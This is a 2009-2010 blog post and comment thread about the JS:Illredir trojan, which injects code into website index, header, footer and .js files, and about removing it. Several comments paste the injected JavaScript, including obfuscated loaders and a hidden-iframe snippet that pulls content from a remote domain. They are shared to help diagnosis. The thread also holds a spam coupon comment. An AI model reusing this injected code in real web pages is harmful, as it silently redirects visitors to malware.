It’s 3.30am and way past my bedtime, but I feel this is extremely important and I must highlight this to everyone.
A few days ago, one of my website clients complained that the blog I setup for them on their server using WordPress could not be accessed. When I checked, it appeared to have a PHP header problem and I had no idea why it should occur, but I merely upgraded the WordPress installation and it seemed to solve the problem. Because he had that problem, I thought I had better check on all my other WordPress blogs on our own hosted servers; and they all had the same problem.
I thought that WordPress was probably having a Christmas party and caused all WordPress blogs to fail. I didn’t have time to check if all other WordPress users had the same problem, but since it was solved easily enough by upgrading the installation.
Later though the same client told me that one of their staff who was updating some things on their website (the non-Wordpress main section) discovered a Trojan called JS:Illredir-B [Trj] when she accessed their website. A brief Google search using that name unearthed nothing. I found sites quoting similar issues though.
http://www.prelovac.com/vladimir/warning-website-virus-attack
http://forum.avast.com/index.php?topic=52476.0
About the Trojan
What’s so dangerous about Trojans? Basically, Trojans are harmful software which, while it seems to be doing what you asked it to do, is busy doing other things that you didn’t ask it to do… like, sending information (credit card information, personal information, financial information, etc) secretly to other people. Or they could rewrite certain codes or links in your browsers so that you are redirected to other websites without your knowledge. For example, you may be trying to visit your bank’s website, and you do key in the website URL manually, but you are rerouted to a phishing website which looks identical because of the code rewrite in your browser.
I’m not sure about what this Trojan really does – I’m not a virus expert. If anyone knows, or when I do find out, I’ll update.
Protect Yourself
I haven’t researched enough or spoken to enough people to find out which of their antiviruses work. It’s in the middle of the night so very few people are awake. All I can say here is, I’m using AVG and this antivirus did not detect the trojan. My client himself who uses Avira also said it was not detected. I’m not here to promote any particular antivirus actually, but my client’s staff (the one who detected it) used Avast Antivirus, so perhaps this may be a good one to use.
How Do We Tell Which Websites Are Under Attack?
Well, in my case, all the websites I was taking care of appeared to be have been attacked. I’ve managed to fix them, but I’ll have to keep an eye on them to make sure that they aren’t attacked again.
I’d like to appeal to everyone out there to be aware of this and to help where you can. My guess is that it is possible that there are many websites out there that have been attacked, but the owners or webmasters are unaware of it. This is because the webpage does not look any different from what it usually does, and this is why it’s so dangerous! Please note that the website owners themselves may not be the perpetrators, and are victims. If you have found any website that has been subjected to the trojan attack, please help out by informing the website owner and/or webmaster right away so that action can be taken.
Here is how you can find out whether the website has been attacked:
- Website seems to be loading slower than usual.
- When the website is loading, check the status bar. If the status bar indicates that there is some traffic being routed to websites of unusual names that are not related to the current website in any way, it is very possible that the website has been attacked.
- The easiest way to find out is to take a look at the page source. Go all the way to the bottom. After </html>, if there is something similar to the following, it indicates that the website has been under attack. This code which appears to be gibberish may also appear anywhere INSIDE the website instead of after </html>.
How to view the page source:
- Internet Explorer: View menu > Source
- Firefox: View menu > Page Source
- Google Chrome: Right-click anywhere on the page > View page source
- Opera: View menu > Page Source
- Safari: Right-click anywhere on the page > View Source OR View menu > View source
Fixing The Websites
For those of you who own websites and would like to know how to remove the trojan, it’s easy – just remove the extra code. Not all files are affected, I’ve found that mostly the following files are affected:
- Files named index or have the word index in them. E.g. index.html, index.php, index.htm, index_main.htm
- Files named home or have the word home in them. E.g. home.html, homepage.htm
- Files named main or have the word main in them. E.g. main.html, main_page.htm
- Files named header or have the word header in them. E.g. header.php, header.inc, header_main.php
- Files named footer or have the word footer in them. E.g. footer.php, footer.inc, footer_main.php
- All javascript files with the .js extension. E.g. javascript.js, functions.js
All folders in your server will be affected, including the root folder, the subfolders, the subdomains, and the subfolders in the subdomains.
While some forums suggest that only Linux servers are affected, I’ve found some of my clients who use Windows servers are also affected.
I think that there are some scripts available for you to download and use on your server so that it will automatically scan and remove the code from all affected files, but I didn’t look for them because some of the other users warned that the files themselves have the virus in them. It’s tedious to remove the codes one by one, of course. What I did was to check the last modified date of the files – in my case, the files were affected on 24th and 25th December 2009. That way, I easily detected which files were modified, and I either removed the code manually or I reuploaded my local copy onto the server. It’s tedious, but I know it works.
If anyone has found anything to add to the above, please let me know by email or by commenting. This is pretty dangerous and it’s so malicious… so please be vigilant and do your bit to help out and spread the word.
One more thing I’d like to add: Don’t expect your webhosting provider to inform you or to work on the problem for you. The moment I discovered this, I wrote to all the webhosting providers that my different websites reside on to ask them to check how this could have happened, and to also ask them to inform their clients, and their responses were about the same. They asked me to choose a password that was difficult to guess, and one said I was the only account affected – and this by a company whom I bought several packages from, ALL of which had been attacked.
133 comments
22 pings
cenzi says:
January 14, 2010 at 6:15 am (UTC 8)
oops.. here it is:
http://takingflightinternational.com/phpmyadmin/remove-js-illredir-b.php
as opposed to
http://takingflightinternational.com/remove-js-illredir-b.php
where it gives me the php4 error…
Mike says:
January 14, 2010 at 7:35 am (UTC 8)
I just checked your home page and my script was able to fix your virus version which looks like IllRedir-C.
You must have not copied your infected files in the correct spot. Infected files must be the same or a subdirectory of where the script is. For example if you place your script undec ~/public_html/remove-js-illredir-b.php, you should place your other websites under: ~/public_html/website1, ~/public_html/website2, ~/public_html/website3 … this way script will fix all of them at once.
In your case you have to place the script as oot/phpmyadmin/remove-js-illredir-b.php.
Hope this helps.
Mike says:
January 17, 2010 at 12:22 am (UTC 8)
Posting again here:
Below is the script removing malicious entries from all affected files. It removes IllRedir-B and C entries.
Please read instructions before executing the script.
http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz
Good luck,
Mike
Zyenweb says:
January 19, 2010 at 10:20 pm (UTC 8)
WARNING, PEOPLE! These trojans are mutating faster than we can keep up. There’s a mutation of this trojan called “Illredir-D [Trj]” which I just found out about today. My AVG Free didn’t pick it up, but Avast did.
@Mike – The script isn’t able to clean this out on the site I tested, so I had to make some mods but I daren’t post it here in case the mods I made are not correct. This trojan is really getting on my nerves!!!
On behalf of everyone here, I’d like to thank both of you who wrote this script so very, very much for taking the time and trouble to create this script and to present it so neatly so that beginners are able to use it quite easily. Also, thank you for putting a link to this page. You’re a godsend!
Mike says:
January 20, 2010 at 12:06 am (UTC 8)
Guys give me a link to a site infected with IllRedir-D and I will modify the script I will also add an option to clean any arbitrary code from those files.
Atanas says:
January 20, 2010 at 6:17 pm (UTC 8)
Hi I just found this page looking for solution how to remove JS:Illredir-D [Trj] that I found today in my hosting. My hosting provider said nothing important about that so I started to look in google.
I have a hosting with 3 web sites on it and I suppose that all of them will be affected – http://www.jivdom.info, http://www.lotrobg.org, http://www.vegebg.org.
Do you have a solution, guys?
valdes says:
January 20, 2010 at 6:29 pm (UTC 8)
I send you a link to a website that contains a trojan JS:Illredir-B [Trj].
http://www.admcourt-varna.com
valdes says:
January 20, 2010 at 6:30 pm (UTC 8)
I send you a link to a website that contains a trojan JS:Illredir-D [Trj].
http://www.admcourt-varna.com
Mike says:
January 21, 2010 at 4:26 am (UTC 8)
Don’t see anything wrong with this website was it cleaned up already ?
Broom says:
January 21, 2010 at 10:44 am (UTC 8)
Hi Mike,
Thanks so much for helping out. I copied the script over to my root directory, but I get a PHP error when I try to run it.
The url is:
http://www.broombox.com/remove-js-illredir-b.php
The error I get is:
Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or ‘}’ in /home/broom6/public_html/remove-js-illredir-b.php on line 84
I also tried it in this url:
http://www.broombox.com/wp-content/plugins/remove-js-illredir-b.php
And get the same Parse error.
Thank you so much.
Broom
Tim says:
January 22, 2010 at 2:23 pm (UTC 8)
Hi Mike, I have just removed JS:Illredir-D [Trj] from my solarwarwarmair.com site but it rooted deep into my main site http://www.solosol.net try this link: http://www.solosol.net/catalog/index.php I am using (was) using AVG and NOD32 on another computer. A customer using ‘AVAST’ reported it to me yesterday. I changed to AVAST and found JS:Illredir-D [Trj]! Any help greatly appreciated
ekimneems says:
January 23, 2010 at 2:22 am (UTC 8)
Does anyone know exactly how this trojan spreads? I used the script to clean all files on all my sites, but it somehow keeps creeping back. It looks like everyone agrees that the source is via FTP, but what is actually injecting the code?
Also, if a server has been completely cleaned an an updated antivirus client like Avast or NOD32 is installed, will it catch the trojan before it injects any code or only after those JS files have been created? Thanks!!
Mike says:
January 23, 2010 at 4:50 am (UTC 8)
You need to change your FTP passwords. And don’t use them with TotalCommander and some other ftp clients with none or very poor encryption
Jim says:
January 26, 2010 at 11:46 am (UTC 8)
I’ve run into this issue on every one of my wordpress sites.
The only thing I could think of at the time was to go into my Dashboard and re-install WP 2.9.1 …. will this alleviate the issue? Or will it continue to come back up?
I use FileZilla to access my server, but have not physically typed my passwords in quite some time. Instead I have it set up through the program so all I have to do is select the server to login.
I could use some help on this. Thank you.
Proudcdn says:
January 26, 2010 at 4:10 pm (UTC 8)
Hello Mike,
Fantastic resource for all of us suffering through this crap.
I am stuck on a linux hosting server running PHP version 4.X (Go DaddY). Is there any script that I can run to clean my sites?
One such site is http://spmabc.com
I have about 6 other sites that are infected too.
Sincerely,
Sean
Mike says:
January 26, 2010 at 11:16 pm (UTC 8)
I will try to port the script, so it runs on PHP4 too.
There is a new mutation it starts with /*Exception*/ i will include it in new version.
Please, wait for my next post.
MIke says:
January 27, 2010 at 11:33 am (UTC 8)
Done http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz version 0.96
– Supports PHP 4!
– Backups file before modification
– Contains cure-fix for all files infected with IllRedir-B, IllRedir-C, IllRedir-D, IllRedir-E
Let me know if you’re having any issues with this release.
Thanks !
Proudcdn says:
January 28, 2010 at 1:54 pm (UTC 8)
Hello,
The script being added to my sites now looks likes this:
try{window.onload=function(){document.write(‘voila-fr.gamespot.com.uol’);Izvperx7vl4q = document.getElementById(‘megaid’).innerHTML + ‘-))c@#$o$m(-#(b^!r$.@&#()s)#)@u@&$^#p@
It does not have the GNU or Exception in front. Any chance the removal tool could be written to deal with this? It currently skips it.
Thanks,
Sean
Mike says:
January 29, 2010 at 12:58 am (UTC 8)
I need an url or samples if you guys want cure
MIke says:
January 29, 2010 at 10:37 am (UTC 8)
http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz version 0.97
– removes eval(base64_decode()) PHP attack
– removes try{window.onload=function(){ document.write( document.write()))}catch() {}
Enjoy !
)
Proudcdn says:
January 30, 2010 at 4:48 pm (UTC 8)
Ok so I am 99.9% certain that the trojan once introduced to your computer invades your FTP client and grabs the log in and password info for your sites. This is how it is able to continually reappear even after you delete and clean install your site.
Mike says:
January 31, 2010 at 1:17 am (UTC 8)
Updated the code version 0.98
@leparachute – version 0.97 of the script was able to remove your version
The new version removes also Didis version
Remember to change FTP passwords on the server and don’t store passwords on the ftp client don’t use TotalComander at all
Hope this helps
Mike says:
January 31, 2010 at 1:41 am (UTC 8)
Per wikipedia http://en.wikipedia.org/wiki/Gumblar
This virus incorporates a network sniffer, so if you’re infected don’t use http/ftp and/or telnet to access your server. The virus will be able to extract open text passwords. Use https however if its smart enough it might use keylogger too.
So, I would recommend:
– make sure all infected boxes are shut down
– boot one box from live linux cd/dvd
– use browser to change passwords on the server (use https)
– from now on use only scp, sftp if possible
– copy virus removal script on the server (into public_html)
– run the script to fix your websites
– download http://www.malwarebytes.org/
– download avast
– dowload bootable antivir cd/dvd like kaspersky .iso
– create bootable antyvir dvd growisofs /dev/dvd=kaspersky.iso
– boot from bootable antvir
– try to clean windows partitions
– if successful boot windows
– otherwise restore your system from CD/DVD or restore partition
– install avast, malwarebytes, personal firewall
– run scans
Mike says:
February 6, 2010 at 12:14 am (UTC 8)
Zyen can you approve my last post ?
Cheeko says:
February 6, 2010 at 8:58 pm (UTC 8)
I use filezilla, i think its not the ftp client but the trojan at the clients pc.
Mike says:
February 7, 2010 at 2:15 am (UTC 8)
Uploaded version 0.99
http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz
- restores chmod to 444
- added latest virus mutations
Hanok says:
February 7, 2010 at 4:32 am (UTC 8)
Hi Mike,
Could you be more specific with what permissions need to be changed when running the script from html? The script file has permissions of 7-5-5.
I’ve also tried the command line.
For example, http://jewsandjoes.com/remove-js-illredir-b.php is where I have uploaded the file.
Hosted with BlueHost, using CPanel. Have cronjobs, but it fails using the commandline you’ve given with error:
Status: 404 Not Found
X-Powered-By: PHP/5.2.11
Content-type: text/html
No input file specified.
yousf says:
February 7, 2010 at 6:22 am (UTC 8)
I traced the trojan back. It expand tp the following code
var today=new Date(),
expires=new Date(today.getTime()+2678400000);
if(navigator.appVersion.indexOf(“MSIE 6″)!=-1&&document.cookie.indexOf(“_mlsdkf=s”)==-1)
{
ifrm=”";
if(today.getTimezoneOffset()==-1)
{ifrm=0}
document.write(ifrm);
document.cookie=”_mlsdkf=s;”+” expires=”+expires.toGMTString()+”; ”
}
yousf says:
February 7, 2010 at 6:23 am (UTC 8)
var today=new Date(),
expires=new Date(today.getTime()+2678400000);
if(navigator.appVersion.indexOf(“MSIE 6″)!=-1&&document.cookie.indexOf(“_mlsdkf=s”)==-1)
{
ifrm=”";
if(today.getTimezoneOffset()==-1)
{ifrm=0}
document.write(ifrm);
document.cookie=”_mlsdkf=s;”+” expires=”+expires.toGMTString()+”; ”
}
yousf says:
February 7, 2010 at 6:24 am (UTC 8)
the ifrm has this value = “iframe width=1 height=1 src=’http://seccatm.net/b2b/’ style=’display:none’”
Mike says:
February 9, 2010 at 12:02 am (UTC 8)
@Hanok – this is because you have Joomla installation. Try to rename your .htaccess file.Then run the script and then restore .htaccess file back. If you don’t have .htaccess file then you have to temporarily comment out the place where you’re doing url rewrites. As far as permissions go you have to have write permissions to all infected files (for apache user or other http user configured by your hosting company) it usually means 0777, the script will try to restore it back to 0444 but unless your files are owned by apache user it wont be possible. First run the script it will tell you which files are infected. Then chmod them 0777, run the script again. If the files are owned by apache user (or other http server user) script will fix them and restore to chmod 0444. Otherwise you will have to restore chmod 0444 on those files.
Josh says:
February 11, 2010 at 11:07 pm (UTC 8)
Think there might be a new mutation of this. A client site of mine got hit with the following on 2/9/2010.
var gb=”;var gg=”;this.lf=”";var _=window;var _j;if(_j!=”){_j=’k'};this._x=false;var t=document;var i=’sEc7rEiEp:tE’.replace(/[E7v\:&]/g, ”);var ir;if(ir!=” && ir!=’y'){ir=”};var td;if(td!=” && td!=’c'){td=”};var x;if(x!=’yz’ && x != ”){x=null};_.onload=function(){var _ba;if(_ba!=’ji’ && _ba != ”){_ba=null};try {o=t.createElement(i);var vv=false;o.src=’h&t%t%p&:?/Y/Yt&u&b3e%8Y-Yc3o%mY.3s?k%y3s3p&o?r&t%s?.3c3o3m&.&hYu?r3r?iYy&eYt?-%c&o3m%-&tYr?.?b3e3s?tYn%eYw3h?aYv3e3n&.3r&u%:?830?8&0?/%pYc?a&uYt3o?.3c%o3m%.3cYn?/%p3c3a?u3t&o3.%c&o3m?.?c?n?/%l?oYv?e32&1Yc?n3.?c&o3m?/3g3oYo?g?l3eY.&c&o?m%.3s?g3/3gYo&o3g%l&e%.&c&o?m3/%’.replace(/[%3\?&Y]/g, ”);var yj;if(yj!=”){yj=’ea’};var kd=”;o.setAttribute(‘dpe5fpe_rC’.replace(/[C_p56]/g, ”), “1″);this.zo=”zo”;this.oe=40788;var vr;if(vr!=” && vr!=’ifs’){vr=null};t.body.appendChild(o);} catch(oz){var n=”;};};
Sandun says:
February 12, 2010 at 5:27 pm (UTC 8)
Hi
I just found that my site is infected by JS:Illredir-K [Trj]. It is detected by Avast 5. Does anyone have a modified tool for remove this virus! Because ver. 0.99 is not useful any more.
Thanks
Georgi says:
February 19, 2010 at 7:53 am (UTC 8)
Hello,
This virus infect my website again and now is the version Q.
Jaakko says:
February 24, 2010 at 9:25 pm (UTC 8)
And we have IllRedir on forums.. cannot get rid of it.
first we had Illredir-S and after several cleanups, it mutated to version W
it puts in each index.php and .js file a script .. after cleanup it returns with different variables…. all in 1 line (similar to Johs’s comment..)
var s;if(s!=’Ya’ && s!=’q'){s=’Ya’};
…
var B=i(‘/7s7uXi7tSe31S071S.Xc3oSmX/SsXuXi3t7eS13031X.7cXo3mS/3o3rSbXi7tSd3o3wSn3lXoXa3d7eXr3.3c7oSmX/SgXo7o3g3lSeS.7cXoSmX/SvSeSoSh7.7c3oSmS.Sp3h7pS’,”7XS3″);var J=i(‘hKtZtZpZ:Z/K/ZmKlKbZ-KcZoKmZ.ZnZeZtZlKoZgK.KcZoKmZ.KdZeKtZiZkZnZeZwKsK-KcKoZmK.KjZeZrKsZeKyKhZoZmZeKsZiZtZeK.KrZuZ:Z’,”KZ”);
…
{Ig=null};
There’s a secret url and path in those variables.. browsers tries to connect to the site, whatever it is doing :S
Gumba says:
February 27, 2010 at 5:39 am (UTC 8)
Looks like I’m on version S, what the heck do I do to remove this?
Andrew says:
February 27, 2010 at 5:55 pm (UTC 8)
Hi Mike,
When trying to start the script with 755 I got such error.
Running… PHP version: 4.4.9
Starting …
Files processed: 6405
Files fixed: 0
When using 777 I’m getting Internal Server Error 404.
I’m using Joomla, htaccess files were renamed.
Can u recommend something?
Kind regards,
Andrew
Mike says:
March 1, 2010 at 12:52 pm (UTC 8)
Version 1.0 is out. Should fix most of the latest versions however if you’re doing something similar to the virus code your code may be removed too. The script is creating backup copies so if something doesn’t work after your run the script keep the script output log and restore from the backups.
@Andrew Try to use latest version , also don’t chmod 777 the script itself just other files. Some php servers wont run the script with write/execute permissions
LuisTim says:
March 5, 2010 at 7:53 pm (UTC 8)
hi guys, I had this virus in my site and with Mike script I cleaned him and worked fine until now.
Now I think that I have a new virus, because Mike script isnt clean my website… he cleaned some files but the website continues with virus
Can someone tell me If is the same virus?
My site is: http://www.filmes-terror.com
I am using ESET NOD32 and he show me that virus name is:
JS/TrojanDownloader.Agent.NSM trojan
I installed AVAST in other PC and he show me that virus name is:
[L] JS:Illredir-W [Trj]
Hatem says:
March 7, 2010 at 9:12 am (UTC 8)
Hi everyone,
the same as LuisTim said
I had the same virus in my site, and it had changed many of things in my pages
first of all I noticed that the buttons of the text editor of my forum (I use vbulletin) got frozen.. they give no action after clicking them, I thought my browser hanged or something then I opened my site from another PC and it is the same,
and when I opened my forum control panel I found it not working properly, I mean when I click “submit” for something, it doesn’t submitting,
the same problem of the text editor happened to other 2 applications I use
After getting a backup of my website on my PC, the NOD32 antivirus notified me that many files (most of them are index files as Mike said) are infected with ((js/trojandownloader.agent.nsm trojan)), and gave me 2 options: 1- Delete, 2- Rename (just renaming it from index.html to index.vhtml)
these infected files are modified in march 1, 2010
Can anyone help???
P.S I’m running the script for more than 30 minutes ago and it just says:
Running… PHP version: 4.4.9
Starting …
Is that normal??
thank you in advance
best regards
Hatem
Barak says:
March 8, 2010 at 7:17 pm (UTC 8)
My sites all starts to fall for this shit virus …. I cleaned it out by hand the files first, but still in some days they just all come back from somewhere. Apart from Avast there is not any antivirus even recognizing something is not okay. My version is mutated to Z already … . What should I try to get rid of it? … Did anyone get really completly rid of it? How did you make that happen?
Thanks for your attention,
B.
florencia says:
March 10, 2010 at 5:45 am (UTC 8)
I’m from Argentina, I have my pages with this virus and really do not understand anything of what you are talking about. Can you help solve it?
examples:
http://www.susanajust.com.ar
http://www.puntopizza.com.ar
Steve says:
March 10, 2010 at 8:53 pm (UTC 8)
Hi
I have JS:Illredir-Y [Trj] trojan on a website running Joomla and detected by avast.
Any fix for that ?
Thanks a lot
Hatem says:
March 11, 2010 at 11:48 am (UTC 8)
(((((( HERE IS THE SOLUTION ))))))
1- Download your entire site
2- Open an infected index file, you will find a strange code at the end of the page, COPY it and paste it in a text file
3- Using your HTML editor (I’m using DreamWeaver), use the “find and replace” option to search for the code in the entire site and replace it with a “space” for example, that’s how you’ll get rid of all the infected files in a few seconds
4- Delete all the files from your site (AFTER GETTING A BACKUP in case if anything goes wrong)
5- Upload your cleaned files
PLEASE NOTE:
1- This damn virus may damage some files, so you may notice some functions are not working properly after cleaning up, because all what we did is that we removed the code, but the virus didn’t only put the code be it also edited (damaged) some files, so if you noticed that some functions are not working properly, you will have to compare your files with the original files
for example, in my forum (VBulletin) I had to replace the files in the “clientscript” folder with the original files that came with the forum when I bought it … because the text editor and some other functions in the admin control panel were not working
2- The Virus may use 2 codes, I think there was a different code in the javascript files (.js)
so after cleaning up, don’t forget to open a javascript file (.js) to check if there is another code. if so, use the same steps to clean
3- After you finish, go to safeweb.norton.com and register to check your site, the site will tell you that your site is queued for checking, and it gonna be checked quickly (my site was checked after a few hours)
THAT’S IT
And, one thing I have learned from this virus, to get a backup of my site everyday
Best Regards
Hatem Tawfik
BokraLena.com
LuisTim says:
March 11, 2010 at 7:33 pm (UTC 8)
hi Hatem,
thank you for your solution… It gives more work but I think that I will try.
I only have one doubt… When I tried to download my site, my antivirus dont let me… because he detects virus in the files.
My question is: It is safe to disable antivirus to download site? I dont got infected by open the files?
Thank you
Barak says:
March 12, 2010 at 12:53 am (UTC 8)
HI Hatem,
Thank you for your answer. Actually I was already trying this, but my problem was that all the .js files seemed to be infected, or at least that is what avast tells me while downloading all the files. When I wanted to clean them, it did not clean it, only quarantine it. Do you know any solution for this?
Thank you for your attention,
B.
Hatem says:
March 12, 2010 at 3:17 am (UTC 8)
Hi
LuisTim & Barak
Here is my steps that I did to fix my site:
1- Full antivirus scan to my computer
2- Uninstall the antivirus (After that don’t open your site via your browser, because the virus will be downloaded to your PC if you did so)
3- Download your entire site using your FTP program
(I’m using Filezilla, and I like it because it tells you if there’s some files failed to download)
REMEMBER not to open any page from your downloaded files via internet explorer or any other browser, because the virus will also be downloaded to your PC if you did so
4- Edit your files using your HTML editor as I explained in the last post
5- Before you upload your fixed files, re-install your antivirus to make sure that you cleaned every infected file
6- If everything ok, delete the files from your host
7- Upload your fixed files
Don’t forget to check all the functions in your site like scripts, text editors, to make sure that everything ok and that the virus didn’t damage any files, and if it did, you will have to replace the infected files with a new ones, as i said in the last post; in my forum (VBulletin) I had to replace the files in the “clientscript” folder with the original files that came with the forum when I bought it, and I also replaced some other scripts’ files outside the forum
I know it will take some times, but I spent more that 4 days searching the web for a solution but I didn’t find any, so I got this idea and it works, it was just 1 hour of work except the time of download and upload
And sorry for being late to answer you, but I’ve just back from work
Best Regards
BokraLena.com
Chuck says:
March 31, 2010 at 12:16 am (UTC 8)
Hey All – I too was infected with the JS:Illredir [Trj] trojan on two of my sites using the avast free antivirus program. My two sites are hosted at 1and1.com. got the same pat answers to a solution, increase password strength, they took no responsibility at all. Anyway I found that the only true fix was to edit the infected files by hand by removing the ansylary code at the bottom of each infected page. (like the code referenced in the above responses – yes it is easy, but if your site is large it could take a bit of time). If you use a site editing prgram like dreamweaver you may be able to replace the code string with a space be doing a search and replce throughtout the entire site. that show speed things up a bit. BE SURE TO CHECK ALL JAVASCRIPT JS FILES!!! Not just your php & html files. The code WILL BE THER ALSO and if not deleted from those files will re-propogate through your site once again…once you have cleaned up all files reset your passwords with type sensitive alpha numeric charaters. IF YOU USE ANY OPEN SOURCE PROGRAMS CHANGE ANY STANDARD PASSWORDS AND FOLDER NAME SETTINGS WHERE EVER YOU CAN! Hope this helps. Good luck to you all. Blessings.
Jimmie Conliffe says:
March 31, 2010 at 7:32 am (UTC 8)
Godaddy coupon codes news. Lots of the current Godaddy.com coupon codes are now invalid. These are reissued coupons that are activated. These promo codes will be working at Godaddy. .COM Domain Names or Manual Renewals for just $7.49 – Use Godaddy coupon codes OK9, ZINE10, or GOO3. 25% discount on orders of $100+ – Use Go Daddy coupon OK25. 30% Discount when you buy any com domain – Use Go Daddy promo code OK30. $12.99 SSL Certificates – Use Godaddy coupons GOOSSL, OKSSL, or ZINESSL. Host Plan Promo Code – 20% Off Hosting – Use Godaddy.com promo codes OK20H, ZINE20H1 or GOO20H. 10% off any size order – Use Godaddy.com coupons OK7, GOO1 or ZINE8. $5 Off $30 or More – Use Godaddy.com coupon codes GOO2 or ZINE9. 20% Off Any order of $50 or more – Use Go Daddy promo code OK8.
Arturo says:
April 2, 2010 at 11:25 am (UTC 8)
Just received letter of deactivation from bluehost. I called them and asked what the reason was. sure enough, it was because of those stupid js redirect trojans. I’ve been at it the whole day trying to clean my files manually.